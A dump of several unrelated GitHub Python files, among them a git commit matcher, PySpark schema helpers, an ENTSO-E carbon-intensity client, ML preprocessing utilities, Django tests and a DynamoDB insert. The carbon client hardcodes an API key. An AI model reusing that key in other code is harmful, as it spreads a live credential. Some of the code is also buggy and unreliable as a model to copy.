In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def __init__(\n self,\n with_additions_deletions: bool = True,\n ignore_merge_commits: bool = True,\n ) -> None:\n super().__init__()\n self.with_additions_deletions = with_additions_deletions\n self.ignore_merge_commits = ignore_merge_commits\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n entry_head_map = sha_to_entry_map(head)\n entry_base_map = sha_to_entry_map(base)\n\n numstat_head_map = create_numstat_map(\n list(entry_head_map.values()),\n self.with_additions_deletions,\n self.ignore_merge_commits,\n )\n numstat_base_map = create_numstat_map(\n list(entry_base_map.values()),\n self.with_additions_deletions,\n self.ignore_merge_commits,\n )\n\n matches = []\n\n for cp_sha, head_entry in numstat_head_map.items():\n if cp_sha not in numstat_base_map:\n continue\n\n matches.append(\n MatchResult(\n head=head_entry,\n base=numstat_base_map[cp_sha],\n )\n )\n\n return matches\n\n\nclass WhitelistMatcher(Matcher):\n \"\"\"A whitelist can be provided from an outside data source to match head and base commits.\n\n All matches will have an ABSOLUTE confidene level.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n\nclass JiraIssueKeyMatcher(Matcher):\n \"\"\"Based on the regular expression r'[\\\\w\\\\d]+-\\\\d+' which matches jira issue keys possible\n matches are determined. A custom regular expression can also be provided.\n A commit may contain multiple issue keys, also multiple matches are possible.\n\n All matches will have a GOOD confidence level. In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n\n\nclass SubjectMatcher(Matcher):\n \"\"\"Based on the subject it is checked whether head subject is contained in base or vice versa.\n\n All matches will have a GOOD confidence level. 
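JiraIssueKeyMatcher above is documented as using the regular expression r'[\w\d]+-\d+' to pull issue keys out of commit text. A quick check of what that pattern captures from a typical subject line:

```python
import re

pattern = re.compile(r'[\w\d]+-\d+')
subject = 'PROJ-123: fix flaky test (follow-up to CORE-7)'
# 'follow-up' is skipped because the part after '-' must be digits
assert pattern.findall(subject) == ['PROJ-123', 'CORE-7']
```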
In case the additions and deletions\n are not matched the confidence level is dropped to LOW.\n \"\"\"\n\n def match(self, head: List[ChangeLogEntry], base: List[ChangeLogEntry]) -> List[MatchResult]:\n \"\"\"Match the hierlog entries\n\n Args:\n head (List[ChangeLogEntry]): Head Bucket List\n base (List[ChangeLogEntry]): Base Bucket List\n\n Raises:\n NotImplementedError: Abstract Placeholder\n\n Returns:\n List[MatchResult]: List of commit Matches\n \"\"\"\n","repo_name":"MatthiasRieck/gitaudit","sub_path":"gitaudit/analysis/merge_diff/matchers.py","file_name":"matchers.py","file_ext":"py","file_size_in_byte":12706,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"2"} +{"seq_id":"37773594","text":"\n\nclass Note:\n\n def __init__(self, note_on, note_off):\n self.value = note_on.note\n self.velocity = note_on.velocity\n self.start_time = note_on.delta\n self.end_time = note_off.delta\n self.duration = self.end_time[0] - self.start_time[0]\n\n\n @staticmethod\n def pair_notes(note_ons, note_offs):\n notes = []\n\n # handle all notes off\n for note_on in note_ons:\n for note_off in note_offs:\n\n if note_off.note == note_on.note:\n notes.append(Note(note_on, note_off))\n return notes\n\n","repo_name":"k4pran/imidi","sub_path":"note.py","file_name":"note.py","file_ext":"py","file_size_in_byte":589,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"23407468711","text":"import logging\nfrom typing import List, Set, Union\n\nfrom pyspark.sql.types import StructType, ArrayType, AtomicType\n\nfrom nestedfunctions.spark_schema.schema_flattener import flatten_schema\n\nlog = logging.getLogger(__name__)\n\n\nclass SparkSchemaUtility:\n\n @staticmethod\n def flatten_schema_include_parents_fields(schema: StructType) -> Set[str]:\n \"\"\"\n returns flattened representation of schema including parent fields names\n \"\"\"\n return set(flatten_schema(schema=schema, include_parent_as_field=True))\n\n @staticmethod\n def flatten_schema(schema: StructType) -> List[str]:\n \"\"\"\n returns flattened representation of schema including only fields which contain values\n (parent fields that holding structure are not presented in the result)\n \"\"\"\n return flatten_schema(schema)\n\n @staticmethod\n def is_column_exist(schema: StructType, column: str) -> bool:\n columns_ordered = column.split('.')\n col = columns_ordered.pop(0)\n if not isinstance(schema, StructType):\n return False\n if col not in schema.names:\n return False\n if len(columns_ordered) == 0:\n return col in schema.names\n\n else:\n return SparkSchemaUtility.is_column_exist(SparkSchemaUtility.__get_schema_for_field(schema, col),\n '.'.join(columns_ordered))\n\n @staticmethod\n def parent_element(column: str):\n separator = '.'\n if '.' 
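pair_notes in the Note record above appends a Note for every note_off whose pitch matches a note_on, so note_offs are never consumed and one note_on can pair with several of them. A common fix is to pair each note_on with the first unused matching note_off; a sketch (event objects with a .note attribute are assumed, as in the original):

```python
def pair_notes_once(note_ons, note_offs):
    remaining = list(note_offs)
    pairs = []
    for on in note_ons:
        for off in remaining:
            if off.note == on.note:
                pairs.append((on, off))
                remaining.remove(off)   # consume it: one pairing per note_off
                break
    return pairs
```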
not in column:\n raise Exception(f\"No parent element in {column}\")\n *parents, last = column.split(separator)\n return separator.join(parents)\n\n @staticmethod\n def __get_schema_for_field(schema: StructType, col: str):\n f = schema[col]\n dt = type(f.dataType)\n\n if dt is ArrayType:\n return f.dataType.elementType\n else:\n return f.dataType\n\n @staticmethod\n def is_array(schema: StructType, field: str) -> bool:\n log.debug(f\"Checking is array for field: {field}\")\n split = field.split(\".\")\n t = schema\n for sub_type in split:\n data_type = t[sub_type].dataType\n if type(data_type) == ArrayType:\n t = data_type.elementType\n else:\n t = data_type\n return type(data_type) == ArrayType\n\n @staticmethod\n def schema_for_field(schema: StructType, field: str) -> Union[StructType, AtomicType]:\n if not SparkSchemaUtility.is_column_exist(schema, field):\n raise Exception(f\"Column `{field}` does not exist\")\n return SparkSchemaUtility.__schema_for_field_rec(schema, field)\n\n @staticmethod\n def __schema_for_field_rec(schema: StructType, field: str) -> StructType:\n if field == \"\":\n return schema\n else:\n columns_ordered = field.split('.')\n col = columns_ordered.pop(0)\n return SparkSchemaUtility.__schema_for_field_rec(SparkSchemaUtility.__get_schema_for_field(schema, col),\n '.'.join(columns_ordered))\n","repo_name":"golosegor/pyspark-nested-fields-functions","sub_path":"nestedfunctions/spark_schema/utility.py","file_name":"utility.py","file_ext":"py","file_size_in_byte":3148,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"27"} +{"seq_id":"29137884161","text":"print(\"Welcome to Isha's general knowledge quiz!\")\n\nplaying = input(\"Should we begin playing? \")\n\nif playing.lower() != \"yes\":\n quit()\n\nprint(\"Let's play then!!\")\nscore = 0\n\nanswer = input(\"Who is the president of the United States? \")\nif answer.lower() == \"joe biden\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\nanswer = input(\"Biggest state in the US? \")\nif answer.lower() == \"alaska\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\nanswer = input(\"Capital of Texas? \")\nif answer.lower() == \"austin\":\n print('Correct!')\n score += 1\nelse:\n print(\"Incorrect!\")\n\n\n\nprint(\"You got \" + str(score) + \" questions correct!\")\nprint(\"You got \" + str((score / 3) * 100) + \"%. 
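The SparkSchemaUtility record above walks a StructType recursively, unwrapping arrays along the way. The standalone `flatten` below sketches the same traversal; it is an illustrative stand-in for the package's flatten_schema and assumes pyspark is installed:

```python
# Standalone sketch of recursive schema flattening (assumes pyspark is installed).
from pyspark.sql.types import ArrayType, StructType, StructField, StringType, IntegerType

def flatten(schema: StructType, prefix: str = "") -> list:
    fields = []
    for f in schema.fields:
        name = f"{prefix}.{f.name}" if prefix else f.name
        # Arrays are unwrapped to their element type, as in __get_schema_for_field.
        dt = f.dataType.elementType if isinstance(f.dataType, ArrayType) else f.dataType
        if isinstance(dt, StructType):
            fields.extend(flatten(dt, name))   # recurse into nested structs
        else:
            fields.append(name)                # leaf field that holds values
    return fields

schema = StructType([
    StructField("id", IntegerType()),
    StructField("address", StructType([
        StructField("city", StringType()),
        StructField("zip", StringType()),
    ])),
])
print(flatten(schema))  # ['id', 'address.city', 'address.zip']
```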
answers right!\")","repo_name":"ishakoregave/Quiz-Game","sub_path":"ishasquiz.py","file_name":"ishasquiz.py","file_ext":"py","file_size_in_byte":741,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"41483929762","text":"import requests\nimport json\nfrom datetime import datetime\nimport xml.etree.ElementTree as ET\nfrom datetime import timedelta\nfrom io import StringIO \nimport pprint\nimport sys\n\npp = pprint.PrettyPrinter(indent=4)\n\nENTSOE_GENERATION_TYPE_CODES ={\n 'B01': 'Biomass',\n 'B02': 'Fossil Brown coal/Lignite',\n 'B03': 'Fossil Coal-derived gas', # Not applicable for Germany\n 'B04': 'Fossil Gas',\n 'B05': 'Fossil Hard coal',\n 'B06': 'Fossil Oil',\n 'B07': 'Fossil Oil shale', # Not applicable for Germany\n 'B08': 'Fossil Peat', # Not applicable for Germany\n 'B09': 'Geothermal',\n 'B10': 'Hydro Pumped Storage',\n 'B11': 'Hydro Run-of-river and poundage',\n 'B12': 'Hydro Water Reservoir',\n 'B13': 'Marine', # Not applicable for Germany\n 'B14': 'Nuclear',\n 'B15': 'Other renewable',\n 'B16': 'Solar',\n 'B17': 'Waste',\n 'B18': 'Wind Offshore',\n 'B19': 'Wind Onshore',\n 'B20': 'Other',\n}\n\nENTSOE_GENERATION_TYPE_GROUPS = {\n 'biomass': ['B01', 'B17'],\n 'coal': ['B02', 'B05', 'B07', 'B08'],\n 'gas': ['B03', 'B04'],\n 'geothermal': ['B09'],\n 'hydro': ['B11', 'B12'],\n 'nuclear': ['B14'],\n 'oil': ['B06'],\n 'solar': ['B16'],\n 'wind': ['B18', 'B19'],\n 'unknown': ['B20', 'B13', 'B15'],\n 'hydro storage': ['B10']\n}\n\n# Source: IPCC 2014 Standards and Electricity Map\n# CIPK - Carbon Intensity Per Kilowatt Hour\nCIPK_VALUES_GENERATION_TYPE_GROUPS = {\n 'biomass': 230,\n 'coal': 820,\n 'gas': 490,\n 'geothermal': 38,\n 'hydro': 24,\n 'nuclear': 12,\n 'oil': 650,\n 'solar': 45,\n 'wind': 11,\n 'unknown': 700,\n 'hydro storage': 345\n}\n\nCIPK_VALUES_FOR_PSR_TYPES = {\n 'B01': 230,\n 'B02': 820,\n 'B03': 490, # Not applicable for Germany\n 'B04': 490,\n 'B05': 820,\n 'B06': 650,\n 'B07': 820, # Not applicable for Germany\n 'B08': 820, # Not applicable for Germany\n 'B09': 38,\n 'B10': 345,\n 'B11': 24,\n 'B12': 24,\n 'B13': 700, # Not applicable for Germany\n 'B14': 12,\n 'B15': 700,\n 'B16': 45,\n 'B17': 230,\n 'B18': 11,\n 'B19': 11,\n 'B20': 700,\n}\n\n\n\nclass CarbonIntensityAPI:\n def __init__(self, in_Domain = '10Y1001A1001A83F', startPeriod = None, endPeriod = None ):\n # Constants\n self.API_KEY = \"42ee4b45-f276-4ef7-88ba-89e4964e54dd\"\n self.API = \"https://transparency.entsoe.eu/api?\"\n\n self.documentType = 'A75' # Actual generation data per type\n self.in_Domain = in_Domain # Domain code for Germany\n self.processType = 'A16' # Realised - Actual Value\n self.genDataDict = {} # Dictionary which holds generation data for every generation group\n self.timestamps = []\n self.CIPKvalues = {}\n self.startPeriod = startPeriod\n self.endPeriod = endPeriod\n\n self.generateTimestamps(startPeriod, endPeriod)\n\n # Generates timestamps between 'startPeriod' and 'endPeriod'\n def generateTimestamps(self, startPeriod = None, endPeriod = None):\n if startPeriod == None or endPeriod == None:\n self.startPeriod = datetime.strftime(datetime.now().replace(hour=0, minute=0, second=0, microsecond=0) - timedelta(days=1), \"%Y%m%d%H%M\")\n self.endPeriod = datetime.strftime(datetime.now().replace(hour=0, minute=0, second=0, microsecond=0), \"%Y%m%d%H%M\")\n for i in range(0,24):\n # Previous day value is used as proxy for today's value. 
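The tables above pair each ENTSO-E production type with an emission factor, and the day's carbon intensity then falls out as a generation-weighted average: CIPK = sum(E_i * F_i) / sum(E_i). A small worked example with invented generation figures (the factors are taken from the table above):

```python
# Generation-weighted carbon intensity; generation figures are made up.
CIPK = {"wind": 11, "gas": 490, "coal": 820}                 # gCO2eq/kWh
generation_mw_15min = {"wind": 200, "gas": 100, "coal": 50}  # MW over one 15-min interval

# MW -> kWh: multiply by 0.25 h per interval, then by 1000 (MWh -> kWh).
energy_kwh = {k: mw * 0.25 * 1000 for k, mw in generation_mw_15min.items()}
total_energy = sum(energy_kwh.values())
total_carbon = sum(energy_kwh[k] * CIPK[k] for k in energy_kwh)
print(round(total_carbon / total_energy, 1), "gCO2eq/kWh")  # 263.4
```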
Add timedelta of 1 day\n timestampGeneration = datetime.strptime(self.startPeriod,\"%Y%m%d%H%M\") + timedelta( hours=(i),days=1 ) \n self.timestamps.append(timestampGeneration)\n elif startPeriod > endPeriod:\n print (\"Invalid Input. Start Period can not be higher that end period\")\n sys.exit(1)\n elif (startPeriod.day > datetime.now().day):\n print (\"Check the Start Period. Please use the script to get past co2 emission data or today's co2 emission forecast\")\n sys.exit(1)\n elif (endPeriod > (datetime.now().replace(hour=0, minute=0) + timedelta(days=1))):\n print (\"Please check the End Period. It can't be greater than today\")\n sys.exit(1)\n else:\n timestamp = self.startPeriod\n while(timestamp < self.endPeriod):\n self.timestamps.append(datetime.strftime(timestamp, \"%Y%m%d%H%M\"))\n timestamp = timestamp + timedelta( hours=1 )\n pp.pprint(str(timestamp) + \" \" + str(self.endPeriod))\n self.startPeriod = datetime.strftime(self.startPeriod, \"%Y%m%d%H%M\")\n self.endPeriod = datetime.strftime(self.endPeriod, \"%Y%m%d%H%M\")\n\n\n def getGenerationPerUnit(self, psrType):\n \"\"\"Query and collect the power generation data of the previous day for\n a generation unit namely coal or gas.\n\n @return:\n \"\"\"\n params = {\n 'securityToken': self.API_KEY,\n 'documentType': self.documentType,\n 'processType': self.processType,\n 'psrType': psrType,\n 'in_Domain': self.in_Domain,\n 'periodStart': self.startPeriod,\n 'periodEnd': self.endPeriod\n }\n\n try:\n queryResponse = requests.get(self.API, params)\n if queryResponse.status_code != 200: \n print(\"co2 api::Not Successful! Status code: \", queryResponse.status_code)\n # This error is raised, as certain psType is not applicable for Germany\n return\n \n # Received string is in HTML format \n apiResponse = ET.iterparse(StringIO(queryResponse.text))\n for _, elementTag in apiResponse:\n prefix, has_namespace, postfix = elementTag.tag.partition('}')\n if has_namespace:\n elementTag.tag = postfix # strip all namespaces\n root = apiResponse.root\n \n generationData = {}\n for timeSeriesTag in root.iter('TimeSeries'):\n for periodTag in timeSeriesTag.iter('Period'):\n for index, point in enumerate(periodTag):\n if (index > 1):\n positionOfPoint = int(point[0].text) - 1\n priceOfPoint = int(point[1].text)\n timestampGeneration = datetime.strptime(self.startPeriod,\"%Y%m%d%H%M\") + timedelta(minutes=(positionOfPoint * 15),days=1)\n generationData[str(timestampGeneration)] = priceOfPoint\n return generationData\n \n except requests.RequestException as e:\n print(\"request exception\")\n print(e)\n\n # Example: Group 'biomass' includes B01(biomass) and B17(waste)\n # Calculate Power Generation of every generation group for the previous day\n def getPowerGenData(self):\n for psrType in ENTSOE_GENERATION_TYPE_CODES:\n self.genDataDict[psrType] = self.getGenerationPerUnit(psrType)\n\n # CIPK Unit : gCO2eq/kWh\n def calculateCarbonIntensity(self):\n for timestamp in self.timestamps:\n totalPowerProduced = 0\n totalCarbonProduced = 0\n i = 0\n while(i < 4):\n for psrType in self.genDataDict:\n if self.genDataDict[psrType] != None:\n # Data has to be converted from MW to kWh\n # Factor 0.25 : To convert from MW to MWh\n # Factor 1000 : To convert from MWh to kWh\n powerPerPsrType = self.genDataDict[psrType][str(timestamp)] * 1000 * 0.25 # Unit : kWh\n totalPowerProduced = totalPowerProduced + ( powerPerPsrType )\n totalCarbonProduced = totalCarbonProduced + ( powerPerPsrType * CIPK_VALUES_FOR_PSR_TYPES[psrType])\n timestamp = timestamp + 
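getGenerationPerUnit strips XML namespaces before walking the tree: ElementTree reports tags as '{uri}LocalName', and `str.partition('}')` throws the URI part away so plain tag names work with `iter()`. The same trick in isolation, with an invented sample document:

```python
# Namespace stripping with str.partition, as used in getGenerationPerUnit.
import xml.etree.ElementTree as ET
from io import StringIO

doc = '<root xmlns="urn:example"><Period><Point>42</Point></Period></root>'
it = ET.iterparse(StringIO(doc))
for _, el in it:
    _, had_ns, local = el.tag.partition('}')
    if had_ns:
        el.tag = local  # drop '{urn:example}' so iter('Point') matches
root = it.root          # available once the iterator is exhausted
print([p.text for p in root.iter('Point')])  # ['42']
```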
timedelta(minutes=15)\n i = i + 1\n CIPK = totalCarbonProduced / totalPowerProduced\n timestamp = timestamp - timedelta(hours=1)\n print(timestamp, totalPowerProduced , totalCarbonProduced )\n self.CIPKvalues[timestamp] = CIPK\n return self.CIPKvalues\n \n\n# datetime(year, month, day, hour, minute)\n# Example: datetime(2017, 11, 28, 23, 55)\nif __name__ == \"__main__\": \n carbonIntensity = CarbonIntensityAPI()\n carbonIntensity.getPowerGenData()\n pp.pprint(carbonIntensity.calculateCarbonIntensity())\n","repo_name":"DinoSubbu/SmartEnergyManagementSystem","sub_path":"backend/co2/co2_api.py","file_name":"co2_api.py","file_ext":"py","file_size_in_byte":8451,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"10963604022","text":"import os\nimport urllib\nfrom IPython.display import display\nimport pyarrow as pa\nimport pyarrow.parquet as pq\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nimport seaborn as sns\nfrom pandas_profiling import ProfileReport\nfrom pandas.plotting import scatter_matrix\nfrom sklearn.model_selection import train_test_split\nimport phik\nfrom scipy import stats\nfrom sklearn.preprocessing import StandardScaler, MinMaxScaler, RobustScaler\n\nclass dataLoader:\n def __init__(self):\n self._ROOT_DIRECTORY = \"./data/\"\n self._TRAIN_LOCAL_PATH = \"./data/train.csv\"\n self._TEST_LOCAL_PATH = \"./data/test.csv\"\n self._SUBMISSION_LOCAL_PATH = \"./results/submission.csv\"\n\n def batch_loader(self, path, is_csv, file_sep = \",\"):\n '''\n Loads the dataset at the given path, in various formats\n '''\n if not is_csv:\n return pd.read_parquet(path)\n else:\n return pd.read_csv(path, sep = file_sep) \n \n def cloud_loader(self, url, name, is_csv, file_sep = \",\"):\n '''\n Fetches a file from an URL and loads it in various formats\n '''\n file = urllib.request.urlretrieve(url, self._ROOT_DIRECTORY + name)\n if not is_csv:\n return pd.read_parquet(file)\n else:\n return pd.read_csv(file, sep = file_sep) \n \nclass dataSplitter:\n def __init__(self, df):\n self._df = df\n\n def train_splitter(self, target=\"\", size=0.2, seed=42, is_Stratified= False):\n '''\n Splits your dataset randomly or stratified according to a target feature\n '''\n if is_Stratified:\n return train_test_split(self._df, self._df[target], test_size = size, random_state = seed, stratify = self._df[target])\n else:\n return train_test_split(self._df, test_size = size, random_state = seed)\n \n \n\nclass dataExplorer:\n def __init__(self, df, categorical, numerical):\n self._SMALL_SIZE = 24\n self._MEDIUM_SIZE = 32\n self._BIGGER_SIZE = 48\n self._df = df\n self._categorical = categorical\n self._numerical = numerical\n\n def basic_explorer(self, target):\n '''\n Returns an overview, basic information and statistics of your dataset\n '''\n display(self._df.head(5))\n display(self._df.info()) \n display(self._df.describe()) \n display(self._df[target].value_counts())\n \n def profile_explorer(self):\n '''\n Returns the pandas-profiling ProfileReport\n '''\n profile = ProfileReport(self._df)\n display(profile)\n \n def outlier_explorer(self, features=[]):\n '''\n Plots a Boxplot to analyze prossible Outliers \n '''\n plt.rc('font', size = self._SMALL_SIZE) \n plt.rc('axes', titlesize = self._SMALL_SIZE) \n plt.rc('axes', labelsize = self._MEDIUM_SIZE) \n plt.rc('xtick', labelsize = self._SMALL_SIZE) \n plt.rc('ytick', labelsize = self._SMALL_SIZE) \n plt.rc('legend', fontsize = self._SMALL_SIZE) \n plt.rc('figure', 
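The splitter's stratified branch passes `stratify=df[target]` so class proportions survive the split. A quick check, assuming pandas and scikit-learn are available:

```python
# Stratified split keeps the 80/20 label ratio in both halves.
import pandas as pd
from sklearn.model_selection import train_test_split

df = pd.DataFrame({"x": range(10), "label": [0] * 8 + [1] * 2})
train, test = train_test_split(df, test_size=0.5, random_state=42, stratify=df["label"])
print(test["label"].value_counts().to_dict())  # {0: 4, 1: 1}: ratio preserved
```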
titlesize = self._BIGGER_SIZE) \n fig = plt.figure(figsize =(self._SMALL_SIZE, self._SMALL_SIZE))\n ax = fig.add_subplot()\n ax.boxplot([self._df[features]], labels =[features])\n ax.set_title('Outliers')\n ax.set_xlabel('Feature')\n ax.set_ylabel('Value')\n display(plt.show());\n\n \n def scatter_explorer(self, numerical, size):\n '''\n Plots an scatter matrix of the numerical fetures of a given dataset\n '''\n display(scatter_matrix(self._df[numerical], figsize = (size, size)));\n\n\n def correlation_explorer(self, target, numerical, is_phik, size):\n '''\n Returns a Pearsons R correlation matrix or an Phik matrix for both categorical and numerical features\n '''\n if not is_phik:\n corr_matrix = self._df.corr(numerical)\n else:\n corr_matrix = self._df.phik_matrix()\n fig, ax = plt.subplots(figsize=(size, size)) \n display(sns.heatmap(corr_matrix, annot=True, linewidths=.5, ax=ax))\n print(corr_matrix[target].sort_values(ascending = False))\n\n\n\nclass dataProcessor:\n def __init__(self, df, categorical, numerical) :\n self._df = df\n self._categorical = categorical\n self._numerical = numerical\n\n \n def imputer_processor(self, is_drop, is_mean = False, is_median = False, is_constant = False, constant = 0):\n '''\n Returns an imputed missing values dataset\n '''\n missing = self._df.isnull().value_counts()\n print(missing)\n if is_drop:\n return self._df[missing].dropna()\n elif is_mean:\n return self._df[missing].fillna((self._df[missing].mean()), inplace = True)\n elif is_median:\n return self._df[missing].fillna((self._df[missing].median()), inplace = True)\n elif is_constant:\n return self._df[missing].fillna(constant, inplace = True)\n else:\n return self._df.drop([missing], axis = 1)\n\n \n def outlier_processor(self, std_threshold = 3):\n '''\n Drops the outliers of a dataset\n '''\n return self._df[(np.abs(stats.zscore(self._df)) < std_threshold).all(axis = 1)]\n\n\n def encoder_processor(self, is_OHE = True):\n '''\n Applies OneHotEncoding to a given dataset\n '''\n if is_OHE:\n return pd.get_dummies(self._df[self._categorical])\n else:\n return self._df\n\n def scaler_processor(self, is_Standard = True, is_MinMax = False, is_Robust = False):\n ''' \n Scales the dataset with Standard/MinMax/RobustScaler\n '''\n if is_Standard:\n scaler = StandardScaler()\n elif is_MinMax:\n scaler = MinMaxScaler()\n elif is_Robust:\n scaler = RobustScaler()\n else:\n scaler = StandardScaler()\n self._df[self._numerical] = scaler.fit_transform(self._df[self._numerical])\n return self._df\n\n\n\n","repo_name":"JMeneu/mlTools","sub_path":"mlTools.py","file_name":"mlTools.py","file_ext":"py","file_size_in_byte":6121,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"21922752713","text":"from django.test import TestCase\nfrom django.urls import resolve, reverse\n\nfrom recipes import views\nfrom recipes.models import Category, Recipe, User\n\n\nclass RecipeViewsTest(TestCase):\n def test_recipe_home_view_function_is_correct(self):\n view = resolve(reverse('recipes:home'))\n self.assertIs(view.func, views.home)\n\n def test_recipe_category_view_function_is_correct(self):\n view = resolve(reverse('recipes:category', kwargs={'category_id': 1}))\n self.assertIs(view.func, views.category)\n\n def test_recipe_category_view_returns__404_if_no_recipes_found(self):\n response = self.client.get(\n reverse('recipes:category', kwargs={'category_id': 10000}))\n self.assertEqual(response.status_code, 404)\n\n def 
test_recipe_detail_view_function_is_correct(self):\n view = resolve(reverse('recipes:recipe', kwargs={'id': 1}))\n self.assertIs(view.func, views.recipe)\n\n def test_recipe_home_returns_status_code_200_ok(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertEqual(response.status_code, 200)\n\n def test_recipe_home_view_loads_correct_template(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertTemplateUsed(response, 'recipes/pages/home.html')\n\n def test_recipes_home_template_shows_no_recipes_found_if_no_recipes(self):\n response = self.client.get(reverse('recipes:home'))\n self.assertIn('No recipes found here', response.content.decode(\n 'utf-8'))\n\n def test_recipe_detail_view_returns_404_if_no_recipes_found(self):\n response = self.client.get(reverse('recipes:recipe', kwargs={'id': 1}))\n self.assertEqual(response.status_code, 404)\n\n def test_recipe_home_template_loads_recipes(self):\n category = Category.objects.create(name='Category Test')\n author = User.objects.create_user(\n first_name=\"User\", last_name=\"Test\", username='user', password='123456', email='username@user.com') # noqa\n\n recipe = Recipe.objects.create(\n title='Recipe Title',\n description='Description',\n slug='recipe-slug',\n preparation_time=10,\n preparation_time_unit='Minutos',\n servings=5,\n servings_unit='Porções',\n preparation_steps='Recipe Preparation Steps',\n preparation_steps_is_html=False,\n is_published=False,\n category=category,\n author=author,\n ) # noqa\n\n response = self.client.get(reverse('recipes:home'))\n content = response.content.decode('utf-8')\n response_context_recipes = response.context['recipes']\n self.assertIn(recipe.title, content)\n self.assertEqual(len(response_context_recipes), 1)\n","repo_name":"metratonpr/curso-django-projeto1","sub_path":"recipes/tests/test_recipe_views.py","file_name":"test_recipe_views.py","file_ext":"py","file_size_in_byte":2785,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11233628915","text":"import boto3\nimport json\n\ndef lambda_handler(event=None, context=None):\n\n dynamodb = boto3.resource('dynamodb')\n table = dynamodb.Table('UsersLeaderboard')\n\n ## insert put\n table.put_item(\n Item={\n 'id': 8,\n 'Week': '2019-11-27',\n 'TopScore': 65335,\n 'Name': 'sangwonHyun'\n }\n )\n\n return {\n 'statusCode': 200\n }","repo_name":"hyunsangwon/AWS_note","sub_path":"DynamoDB/sample-code-python/Insert.py","file_name":"Insert.py","file_ext":"py","file_size_in_byte":397,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"27"} +{"seq_id":"20205378790","text":"from ..models.body_part import BodyPart\nfrom mongoengine.queryset.visitor import Q\nfrom .entry import EntryController, day_times\nfrom ..models.entry import Entry\nfrom statistics import mean, stdev, median\nimport queue\n\ninitial_histogram = {\n 'none': 0,\n 'low': 0,\n 'medium': 0,\n 'high': 0,\n 'xHigh': 0,\n}\n\nhistogram_map = {\n 'none': (0, 2),\n 'low': (2, 4),\n 'medium': (4, 6),\n 'high': (6, 8),\n 'xHigh': (8, 10)\n}\n\nclass BodyPartController():\n\n # Given a user, a body part id and optional parameters, returns the body\n # part along with statistics for the entries that satisfy the parameters.\n @staticmethod\n def getBodyPartByID(user, bpid, start_date=None, end_date=None, time_of_day=None, detail_level='high'):\n\n body_part = BodyPart.objects(pk=bpid).first()\n\n pain_entries = EntryController.getPainEntries(user, body_part, start_date, 
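histogram_map above encodes half-open buckets as (low, high) tuples; only the top bucket is closed on the right, as the controller's bucketing method makes explicit further down. A compact version of that lookup (the `bucket` helper is an illustration, not part of the controller):

```python
# Half-open pain-level buckets, mirroring histogram_map in the record above.
histogram_map = {
    "none": (0, 2), "low": (2, 4), "medium": (4, 6), "high": (6, 8), "xHigh": (8, 10),
}

def bucket(pain_level):
    for name, (lo, hi) in histogram_map.items():
        # the top bucket is closed on the right so a maximum score of 10 still bins
        if lo <= pain_level < hi or (name == "xHigh" and pain_level == hi):
            return name

hist = {k: 0 for k in histogram_map}
for level in [1, 3.5, 9, 10]:
    hist[bucket(level)] += 1
print(hist)  # {'none': 1, 'low': 1, 'medium': 0, 'high': 0, 'xHigh': 2}
```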
end_date, time_of_day)\n\n pain_stats = BodyPartController.computeBodyPartStats(body_part, pain_entries, start_date, end_date, time_of_day, detail_level)\n\n return (body_part, pain_stats)\n\n # Given a body part, a list of pain entries (i.e. a list of dicts that\n # contain the date, daytime, and pain level) and optional parameters,\n # returns a dict of stats for the body part.\n @staticmethod\n def computeBodyPartStats(body_part, pain_entries, start_date=None, end_date=None, time_of_day=None, detail_level='high', movingWindowSize=3):\n\n if len(pain_entries) > 0:\n pain_stats = {\n 'total': BodyPartController.computeTotalStats(pain_entries),\n 'daytime': BodyPartController.computeDaytimeStats(pain_entries),\n }\n\n if detail_level == 'high':\n calendar_stats = BodyPartController.computeCalendarStats(pain_entries)\n\n pain_stats.update({\n 'calendar': calendar_stats,\n 'moving': BodyPartController.computeMovingStats(calendar_stats, int(movingWindowSize)),\n 'histogram': BodyPartController.computeHistogram(calendar_stats)\n })\n else:\n pain_stats = {\n 'total': [],\n 'daytime': []\n }\n\n if detail_level == 'high':\n pain_stats.update({\n 'calendar': [],\n 'moving': [],\n 'histogram': []\n })\n\n return pain_stats\n\n # Given a list of pain entries (see computeBodyPartStats()), returns the\n # stats for all of the entries.\n @staticmethod\n def computeTotalStats(pain_entries):\n pain_levels = [pain_entry['pain_level'] for pain_entry in pain_entries]\n\n total_stats = 